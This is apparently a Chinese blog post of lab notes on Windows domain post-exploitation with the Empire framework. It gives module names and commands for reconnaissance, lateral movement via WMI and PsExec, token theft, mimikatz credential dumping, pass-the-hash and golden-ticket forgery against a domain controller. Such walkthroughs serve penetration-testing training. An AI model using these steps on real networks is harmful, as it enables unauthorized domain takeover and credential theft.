Empire域内渗透

最新推荐文章于 2024-11-09 23:34:47 发布
最新推荐文章于 2024-11-09 23:34:47 发布
阅读量124 收藏
点赞数
分类专栏: 后渗透emp使用 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyj1781572/article/details/127826464
版权
  1. 环境

 

计算机名

IP

dc

192.168.0.123

d

192.168.0.120

Databas2

192.168.0.121

2.模块使用

用基本的命令查询本地的信息

sysinfo

whoami

info

arp扫描

situational_awareness/network/arpscan

查找本地管理员

situational_awareness/network/powerview/find_localadmin_access

moonsec这个用户是否是域内某一台主机的本地管理员

 确定是否能访问 database2的c盘

查找域控

situational_awareness/network/powerview/get_domain_controller

会话注入

lateral_movement/invoke_wmi

lateral_movement/invoke_psexec

通过invoke_wmi 或者 psexe模块 拿到database2的权限

lateral_movement/invoke_wmi 

设置好监听器和计算机名用execute执行

invoke_wmi 系统自带

psexec 留下记录

lateral_movement/invoke_psexec

获取系统权限

 

 

命令token窃取

窃取之后就有dc的访问权限

ps 查询进程是否有域内超级管理员

 

steal_token 1748

shell dir \\dc\C$

恢复原来身份可以用

revtoself

凭证获取

mimikatz

当前的权限为1 我们就可以用mimikatz 这个命令 获取明文 还有用户的一些凭证。

我们获取之后可以用一个creds命令 查询用户凭证信息

获取域控权限

use lateral_movement/invoke_wmi

填写好

Listener

Credid

ComputerName

 

 

用mmimikatz获取的凭证信息还有什么用

pth 获取域控的访问权限。

3.制作黄金钥匙

creads

credentials/mimikatz/lsadump

krtbtgt 哈希

credentials/mimikatz/golden_ticket

set credid 4

set user Administrator

execute

 

制作好的黄金票据 十年才会失效 测试黄金票据

shell dir \\dc\C$      

jack-yyj
关注
专栏目录
Empire后渗透框架--安装、爬坑记录
venu_s的博客
07-13 629
Empire安装记录 Empire简介 Empire后渗透框架,这个框架是为了内网渗透,主要针对windows内网渗透,这个框架集合了很多powershell内网渗透脚本,它支持内网渗透,宏钓鱼,内网横行扩展,权限维持,后门生成等 安装环境 Ubuntu 21.04、Anaconda Empire下载 官网 http://www.powershellempire.com/ 下载 https://github.com/EmpireProject/Empire Anaconda下载 官网下载 https:
由浅入深的渗透系列一(下)1
08-03
【由浅入深的渗透系列一(下)1】这篇文章主要讲述了在网络安全中的渗透技术,涉及多个工具和方法。以下是对其中关键知识点的详细说明: 1. **Empire(ew)穿透**:Empire是一个现代的、动态的、Python编写...
Empire(三)渗透
qq_56426046的博客
09-15 282
如果内用户访问不了外部网站,我们需要登录管理员账户对浏览器属性安全进行设置,设置可信任的站点并应用,这样用户的浏览器才能访问信任的网站。
Empire渗透神器
weixin_43749601的博客
03-23 795
安装 git命令下载 git clone https://github.com/EmpireProject/Empire.git 接着进入setup目录,安装Empire cd Empire cd setup sudo ./install.sh 但是会出现报错 Traceback (most recent call last): File "./empire", line 13, in <module> from lib.common import empire, helpers
在Empire实战渗透
weixin_34150224的博客
09-19 165
本文讲的是在Empire实战渗透, 0x01 写在开始 上一篇文章只是单纯的介绍了一些Empire的基本用法,但这么强大的工具根本不是一篇文章可以说清楚的,就像Metasploit,如果我单纯写一篇文章给你,告诉你这就是Metasploit全部的用法了。但是,真正的实战中,绝对是一脸蒙蔽的往着眼前的显示器,我要用什么命令?我接下来要用什么模块?类似这...
初探渗透神器Empire
weixin_33875564的博客
09-19 279
本文讲的是初探渗透神器Empire, 0x01奇怪的开始 我趁手机不注意,把它自由落体了,好在屏幕没裂开,只不过是断触了,要不对于已经穷疯了的我无疑又是一笔经济负担。好在手机还在保修期内,可以送过去修,但是我去的时间点不对。售后说要下班了,手机要明天才能修,我也没多说什么,手机留下就回来了。晚上,蹲厕所,叼着烟对着手纸发呆,心想:“我擦,我484傻,...
内网渗透测试:内权限维持思路总结
qq_45521281的博客
02-21 2245
我的Freebuf:https://www.freebuf.com/author/MrAnonymous 我的博客:https://whoamianony.top/ 文章目录Windows 操作系统常见持久性后门Windows系统隐藏账户Shift 粘滞键后门(1)手动制作(2)Empire 下的利用注册表键后门(1)手动制作(2)Metasploit 下的利用(3)Empire 下的利用Windows 计划任务后门(1)利用 at 命令(2)利用 schtasks 命令(3)利用SharPersist工.
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 8万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
内 dcsync 权限维持
admin的博客
05-23 1253
DCSync 是渗透中经常会用到的技术,其被整合在了 Mimikatz 中。在 DCSync 功能出现之前,要想获得用户的哈希,需要登录控制器,在控制器上执行代码才能获得用户的哈希。该功能可以模仿一个控制器,从真实的控制器中请求数据,例如用户的哈希。该功能最大的特点就是不用登陆控制器,即可远程通过数据同步复制的方式获得控制器上的的数据。
渗透-控维权
m0_58606546的博客
11-20 1229
一:DSRM后门 DSRM ( Directory Services Restore Mode,目录服务恢复模式)是Windows环境中控制器的安全模式启动选项。每个控制器都有一个本地管理员账户 (也就是DSRM账户)。DSRM的用途是:允许管理员在环境中出现故障或崩溃时还原、修复、重建活动目录数据库,使环境的运行恢复正常。在环境创建初期,DSRM的密码需要在安装DC时设置,且很少会被重置。修改DSRM密码最基本的方法是在DC上运行ntdsutil 命令行工具。 在渗透测试中,可以使用DSR
渗透总结
2201_75378806的博客
04-16 596
总结
Empire知识点梳理
09-25
- **列出内所有的共享**:`usemodule situational_awareness/network/powerview/share_finder` - **提权(Privilege Escalation)** - **绕过UAC**:`usemodule privesc/bypassuac` 或 `usemodule powershell/...
【网络】深入理解 HTTPS:确保数据传输安全的核心协议
人生苦短,睡觉要紧,睡醒再说
11-06 1550
HTTPS(HyperText Transfer Protocol Secure)是 HTTP 协议的安全版本。HTTP 是用于客户端与服务器之间传输网页数据的协议,而 HTTPS 在 HTTP 协议的基础上添加了一层SSL/TLS加密协议,使得传输的数据在网络中不易被窃取或篡改。HTTPS 通常用于传输敏感信息,如登录凭证、支付信息、个人数据等。与 HTTP 协议不同,HTTPS 在数据传输过程中会对信息进行加密,确保数据在传输过程中不被第三方监听或修改。
【浪潮商城-注册安全分析报告-无验证方式导致安全隐患】
weixin_46641057的博客
11-09 848
浪潮集团是中国领先的云计算、大数据服务商,拥有浪潮信息、浪潮软件、浪潮数字企业三家上市公司。主要业务涉及计算装备、软件、云计算服务、新一代通信、大数据及若干应用场景。已为全球一百二十多个国家和地区提供IT产品和服务。作为国内做电脑硬件起家发展为综合型大型科技企业,拥有雄厚的技术实力,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定。
PHP常用的安全函数作用
sheji888的专栏
11-06 482
这些函数和方法有助于提升PHP应用的安全性,但安全是一个综合性的问题,需要综合使用多种手段,如输入验证、输出编码、会话管理、错误处理等。在PHP开发中,安全是非常重要的一个方面。
【AliCloud】ack + ack-secret-manager + kms 敏感数据安全存储
最新发布
StrayCat的博客
11-09 659
ack-secret-manager支持以Kubernetes Secret实例的形式向集群导入或同步KMS凭据信息,确保您集群内的应用能够安全地访问敏感信息。通过该组件,您可以实现密钥数据的自动更新,使应用负载通过文件系统挂载指定Secret实例来使用凭据信息,同时帮助您解决负载应用和阿里云凭据管家交互的兼容性问题。
【销帮帮-注册_登录安全分析报告-试用页面存在安全隐患】
weixin_46641057的博客
11-09 517
杭州逍邦网络科技有限公司成立于2015年,是国内一线CRM品牌和企服领知名品牌。致力为客户提供专业的客户全生命周期管理和数字化销售管理服务,助力企业提升业绩,让企业更成功。销帮帮拥有强大而灵活的“PaaS+低代码”能力。在吸取了同行滑动验证码的经验后,自己研发了独特风格的那个验证码, 从逆向代码来看, 不仅借鉴了同行的技术原理,还在防抓取上下了功夫,防模拟器鼠标,物理鼠标和逻辑鼠标定位不一致判断措施,解决思路为让JS 这部分代码失效或这采用 物理定位鼠标的部分,目前采用的是物理鼠标的方式。
5. Redis的 安全与性能优化
一名全栈开发工程师
11-06 771
Redis引入了“沙盒机制”,即在脚本执行过程中,脚本被限制只能访问Redis的某些命令和数据集。
安全关机和重启NDB集群
cncdns的专栏
11-09 256
在生产环境中,完全关闭集群通常是不可取的。在许多情况下,即使在进行配置更改或对集群硬件或软件(或两者兼而有之)进行升级时,这需要关闭单个主机,也可以通过执行滚动重新启动集群来关闭整个集群。
Empire内网渗透指南:从安装到实战
"这篇文档详细介绍了如何使用Empire进行内网渗透测试,Empire是一个基于Python的Powershell代理框架,适用于Windows环境的渗透测试。文档适合初学者,提供了从安装到实际操作的一系列步骤。" Empire是渗透测试者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jack-yyj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值